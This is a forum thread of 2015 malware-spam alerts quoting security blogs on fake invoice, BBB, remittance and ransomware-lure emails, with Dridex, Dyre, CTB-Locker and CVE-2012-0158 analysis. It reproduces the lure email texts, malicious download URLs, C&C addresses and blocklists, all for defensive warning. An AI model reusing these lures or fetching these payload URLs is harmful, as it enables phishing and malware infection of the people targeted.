Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Your-latest-e-invoice-from-FINNAUST-MINING-PLC.png
___

Fake 'Outstanding Invoice' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-gail-walker.html
11 Feb 2015 - "This fake invoice does -NOT- come from MBL Seminars, they are -not- sending this spam nor have their systems been compromised. Instead, this is a -forgery- with a malicious attachment.
From: Gail Walker [gail@ mblseminars .com]
Date: 11 February 2015 at 09:52
Subject: Outstanding Invoice 271741
Dear Customer
Payment for your Season Ticket was due by 31 January 2015 and has not yet been received. A copy of the invoice is attached.
By way of a reminder, the Season Ticket entitles all members of your organisation to save up to 50% on our public seminars and webinars. Since being a Season Ticket Holder your organisation has saved £728.50.
Please arrange for payment by return by BACS, cheque, or credit card. If payment has been arranged and just not reached us yet then please ignore this email.
If you have any queries, please do not hesitate to contact us.
Regards
Gail Walker
MBL (Seminars) Limited ...

So far I have seen two different malicious Word documents (there may be more) with low detection rates [1] [2] containing a different macro each... This file is saved as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57*... It also drops a DLL with a detection rate of 3/57** which is probably Dridex.
Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70 "
1] https://www.virustotal.com/en/file/30b22b141dcab6cc981008ddb04d95f90fa87ce2aeb41affd27bd5a704f62fd4/analysis/1423653571/

2] https://www.virustotal.com/en/file/83223934492586e28666cdb2ee4bf2bb3e78ead6d78d691274a5fe27a7fbb9a3/analysis/1423653583/

* https://www.virustotal.com/en/file/9e873d66a8663fcbccc0a959adbbc924e3cbc4cd04746411d3ffbd7d5337220e/analysis/1423653592/

** https://www.virustotal.com/en/file/10bf548e73dffefc5f4da1fa6d3d61922fec614726f18a22f49be0e8f9f7901e/analysis/1423654973/


- http://myonlinesecurity.co.uk/gail-walker-mbl-seminars-limited-outstanding-invoice-271741-word-doc-malware/
11 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Outstanding-Invoice-271741.png

:fear: :mad:

AplusWebMaster
2015-02-12, 15:38
FYI...

Fake BBB SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-bbb-accreditation-services.html
12 Feb 2012 - "This -fake- BBB email has a malicious attachment.
From: BBB Accreditation Services [no-replay@ newyork .bbb .org]
Date: Thu, 12 Feb 2015 10:50:01 +0000
Subject: BBB SBQ Form
Thank you for supporting your Better Business Bureau (BBB).
As a service to BBB Accredited Businesses, we try to ensure that the information we provide to potential customers is as accurate as possible. In order for us to provide the correct information to the public, we ask that you review the information that we have on file for your company.
We encourage you to print this SBQ Form, answer the questions and respond to us. (Adobe PDF)
Please look carefully at your telephone and fax numbers on this sheet, and let us know any and all numbers used for your business (including 800, 900, rollover, and remote call forwarding). Our automated system is driven by telephone/fax numbers, so having accurate information is critical for consumers to find information about your business easily.
Thank you again for your support, and we look forward to receiving this updated information.
Sincerely,
Accreditation Services

Attached is a file SQB Form.zip which contains a malicious executable SQB Form.exe. This has a VirusTotal detection rate of 4/57*. Automated analysis tools... show that attempts to connect to these following legitimate IPs and domains to determine the IP address and current time:
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
time.microsoft.akadns .net
checkip.dyndns .org
Of these, checkip.dyndns .org is worth monitoring as it is often an indicator of infection.
The Anubis report also shows a DNS query to semiyun .com on 95.173.170.227*** (Netinternet, Turkey). Also the Malwr report shows connections to the following URLs:
http ://92.240.99.70:12112/1202uk11/HOME/0/51-SP:/0/ELHBEDIBEHGBEHK
http ://92.240.99.70:12112/1202uk11/HOME/41/7/4/
http ://semiyun .com/mandoc/previewa.pdf
Of these, 92.240.99.70 (Ukrainian High Technologies Ltd, Ukraine) looks like the C&C server and this should definitely be -blocked-. A file jeoQxZ5.exe is also dropped with a detection rate of 6/57**. This is most likely the Dyre banking trojan..."
* https://www.virustotal.com/en/file/262d1398851f1f43f4382812e744b3cbc484ae9f4605e03f65c3977919e32a6c/analysis/1423739716/

** https://www.virustotal.com/en/file/1d90a17f9f4a8d0a17c46a82f4e48b8a645ddde67c59cfe89becd34b20a4bd25/analysis/1423741855/

*** 95.173.170.227: https://www.virustotal.com/en/ip-address/95.173.170.227/information/
___

Fake 'invoice :reminder' SPAM - leads to CVE-2012-0158 exploit
- http://blog.dynamoo.com/2015/02/invoice-reminder-spam-leads-to-cve-2012.html
12 Feb 2015 - "This spam has a malicious attachment:
From: Hajime Daichi
Date: 12 February 2015 at 15:59
Subject: invoice :reminder
Greetings.
Please find attached invoice copy for a transfer of USD29,900.00 payed to
your company account yesterday.
You can save, view and print this SWIFT message at your convenience.
Please email should you require any additional information on this
transaction.
We thank you for your continued patronage.
Corp. Office / Showroom:
# 8-2-293/82/A/706/1,
Road No. 36, Jubilee Hills,
HYDERABAD - 500 033.
Tel: +91 40 2355 4474 / 77
Fax:+91 40 2355 4466
E-mail: info@ valueline .in
Branches : VIZAG | VIJAYAWADA | BANGALORE | MUMBA

Attached is a file INVOICE.doc which is actually not a DOC at all, but an RTF file. A scan of the file at VirusTotal indicates that it is malicious, with a detection rate of 6/57*. Those detections indicate that this is exploitng CVE-2012-0158 aka MS12-027, a security flaw patched almost three years ago. So if you keep your patches up-to-date, there's a good chance you will be OK. But if you are running an ancient version of Microsoft Office (for example Office 2000, 2002 or XP) then you could be in trouble. The Malwr report for this is quite enlightening, showing the malware downloading another document from directxex .net/7783ed117ba0d69e/wisdomjacobs.exe. This has a detection rate of 14/57** and the Malwr report for this indicates that among other things it installs a -keylogger- confirmed by the ThreatExpert report.
The domain directxex .net [Google Safebrowsing***] has an unsavoury reputation, and although it is currently hiding behind a Cloudflare IP, it actually appears to be hosted on an OVH France IP of 5.135.127.68. I definitely recommend that you -block- traffic to directxex .net."
* https://www.virustotal.com/en/file/a3a794d582a3f006981ed7c02ec540cf4b21e53bf2d7cb9fb8154a78da4b7228/analysis/1423764503/

** https://www.virustotal.com/en/file/754044eb9a2a2cc5bfbb1e955a9ef7e94c694cfde4ab59ea8e55ea68d106affb/analysis/1423765263/

*** https://www.google.com/safebrowsing/diagnostic?site=directxex.net
"... listed for suspicious activity 122 time(s) over the past 90 days...

> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH)
___

Fake 'INVOICE' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-minuteman-press-west-loop.html
12 Feb 2015 - "This -fake- invoice comes with a malicious attachment. It does not come from Minuteman Press, their systems have not been compromised in any way. Instead this is a simple email -forgery-.
From: Minuteman Press West Loop [westloop@ minutemanpress .com]
Reply-To: westloop@ minutemanpress .com
Date: 12 February 2015 at 09:00
Subject: INVOICE 1398 - FEB 4 2015
(Please see attached file: INVOICE 1398 - FEB 4 2015.DOC)
Thank you for your business.
Julio Lopez | Design Manager | Minuteman Press West Loop
1326 W. Washington Blvd. | Chicago, IL 60607
p 312.291.8966 | f 312.929.2472 |

I have seen just a single sample with an attachment INVOICE 1398 - FEB 4 2015.doc, although usually there are two or more variants so you may see slightly different ones. The DOC file has a VirusTotal detection rate of 0/57* and contains this malicious macro which downloads a second component from:
http ://ecinteriordesign .com/js/bin.exe
This is then saved as %TEMP%\\IHJfffFF.exe and has a detection rate of 7/57**. Automated analysis tools... show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago***."
* https://www.virustotal.com/en/file/01cb3eedc33553959d548134caf0552662bbb3cdb3cc4c94dd037a6f9aa577a4/analysis/1423734590/

** https://www.virustotal.com/en/file/a42dc7abd83b0e329b846ea280c02812454acb5b98902adda8cfc786866fac5d/analysis/1423734603/

*** https://www.virustotal.com/en/file/50f6ae0daf2b2e5b2a4822d859fd3d503d9efa29871ecb286480fc8c4ffdd7c7/analysis/
___

CTB-Locker Ransomware Spoofs Chrome and Facebook Emails as Lures, Linked to Phishing
- http://blog.trendmicro.com/trendlabs-security-intelligence/ctb-locker-ransomware-spoofs-chrome-and-facebook-emails-as-lures-linked-to-phishing/
Feb 12, 2015 - "... We are seeing another wave of CTB-Locker -ransomware- making their way into the wild. What’s highly notable about this current batch of crypto-ransomware is that they are using “big names” like Facebook and Google Chrome as social engineering lures.
The New Lures: We observed that the CTB-Locker ransomware arrives through spammed emails pretending to be from Google Chrome and Facebook. The -fake- Google Chrome email pretends to be a notification about updating the recipient’s Chrome browser. Upon clicking-the-link, the user will be directed to a site hosting the malware. The malware uses a Google Chrome -icon- to disguise itself as a legitimate installer package. This is actually a variant detected as TROJ_CRYPCTB.YUX.
Fake Google Chrome email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-1.png
Another lure used by cybercriminals is Facebook. The email arrives as an account suspension notificaiton. The email instructs the user to click on an embedded link. This link will lead to the download of the malware:
Fake Facebook email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-2.png
The malware uses a .PDF icon to disguise itself as a legitimate file. This malware is detected as TROJ_CRYPCTB.NSA. Our findings show that -both- variants are hosted in -compromised- sites. And interestingly enough, each variant is hosted on a group of compromised sites that is linked to one IP address. Connections to Phishing: Digging deeper into these compromised sites, we discovered that some of these URLs are associated with phishing spam, specifically those using -PayPal- as their lure.
Fake PayPal email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-3.png
The spammed email arrives with the subject, “Take Action PayPal.” The email instructs the recipient to log in to their PayPal account to settle an issue by clicking-a-link in the email. Upon clicking, the link redirects to a phishing site. The site asks not only for the user’s login credentials, but other important, sensitive information like contact details and credit card information.
Fake PayPal site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-4.png
Information requested by the phishing site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-5.png
Once the user completes all the information, the site then redirects the person to the legitimate PayPal login page. To avoid suspicion, it uses the excuse of needing to log in -again- for the changes to fully reflect in the PayPal account. Using the same URLs as those of the CTB-Locker malware suggests that the threat actors distributing the ransomware are also dabbling in phishing... CTB-Locker variants included language support for four languages: English, German, Italian, and Dutch. This new batch of ransomware now supports seven languages, namely, French, Spanish, Latvian, German, Dutch, Italian, and English.
Ransom message:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-6.png
... The malware also now arrives in a Windows installer package. The two new variants identified were wrapped in an installer using using NSIS. Cybercriminals leverage NSIS, which is an open source installer like InstallShield, to make analysis difficult. When executed, the malware drops an encrypted version of the CRYPCTB malware and a library (.DLL) file. The library file will decrypt and execute the ransomware. After the routine, the library file will delete itself. In a surprising move, the cybercriminals adjusted the ransom payment for the decryption of files to 2 BTC, a fee lower than the 3 BTC ransom fee of previous variants. The malware also uses new set of Tor Addresses to communicate with the affected system... the added languages are all for countries based in Europe. This suggests that these variants may be targeting the EMEA region...
Top countries affected by CRYPCTB malware family:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-72.jpg
... Conclusion: From what we’ve seen, the threat actors focused more on improving their chances of spreading the malware than improving the design of the code itself. Once the malware is in the system, it can be very challenging to recover the files without getting their help. As we have mentioned in previous entries, it might be tempting to give in and pay the ransom fee to get back encrypted files. However, there is no guarantee that the cybercriminals will actually honor the exchange. At the very worst, the victim is left with no files and no money..."

:fear: :mad:

AplusWebMaster
2015-02-13, 17:49
FYI...

Fake 'Remittance' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-remittance-xx12345678.html
13 Feb 2015 - "This -spam- comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:
From: Gale Barlow
Date: 13 February 2015 at 12:30
Subject: Remittance IN56583285
Dear Sir/Madam,
I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.
Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
Gale Barlow
Accounts Manager
4D PHARMA PLC
Boyd Huffman
Accounts Payable
GETECH GROUP

There is a malicious Word document attached to the email, so far I have only seen one version of this but usually there are two or more. The document itself has a low detection rate of 1/57* and it contains a malicious macro which downloads a file from the following location:
http ://62.76.188.221 /aksjdderwd/asdbwk/dhoei.exe
This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57**, identifed as a Dridex downloader. Automated analysis tools... show a variety of activities, including communications with the following IPs:
85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52*** and mysteriously drops another Dridex downloader with a detection rate of 6/57****. The Malwr report for that indicates there is some attempting traffic to nonexistent domains.
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159 "
* https://www.virustotal.com/en/file/84ef5406a61b4fb0703768a120e9f107d569387276357d88ef77c936c1ec109a/analysis/1423835743/

** https://www.virustotal.com/en/file/2ad9b362775fe8a5a70ea4707325699123480e2827abdd2893ff566b80e86ea8/analysis/1423835772/

*** https://www.virustotal.com/en/file/c6d838b4f4635bdc23f12cb0961cbf2ed7d8358eb7259c71946aa2d3cdd816cf/analysis/1423836506/

**** https://www.virustotal.com/en/file/03a7986ae0b058e1471c549ea18dfe76a6ab162d7f696509a7f57e2abbafbdef/analysis/1423836488/
___

Fake 'PURCHASE ORDER' SPAM - doc malware
- http://myonlinesecurity.co.uk/alison-longworth-universal-sealants-uk-limited-purchase-order-34663-word-